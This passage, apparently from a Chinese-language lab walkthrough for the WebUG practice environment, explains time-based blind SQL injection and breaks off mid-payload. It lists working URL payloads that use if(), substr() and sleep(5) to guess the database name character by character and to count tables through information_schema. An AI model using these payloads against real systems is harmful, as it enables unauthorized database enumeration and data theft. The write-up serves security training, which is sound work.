一、延时注入
延时注入是基于布尔注入的, 简单来说, 是通过if语句返回的真(true)或假(false)来确定是否执行网页延迟响应,当布尔注入不成功时,即不能直接观察页面的返回正常与否来判断sql语句是否执行成功, 我们这时候就可以采用延迟注入。
这个也可以用布尔注入,不过既然考察延时注入,还是学习下比较好。
1.先判断字段数
2.判断数据库(webug)
?id=1’ and if(substr(database(),1,1)=‘w’,sleep(5),1)%23 (判断数据库第一个字母是否为w,是的沉睡5秒)
?id=1’ and if(substr(database(),2,1)=‘w’,sleep(5),1)%23 (判断数据库第二个字母是否为w,很明显不是)
最终判断出数据库为webug
3.爆出webug数据库中所有表
?id=1’ and if((select count(table_name) from information_schema.tables where table_schema=database())>6,sleep(5),1)%23
?id=1’ and if((select count(table_name) from i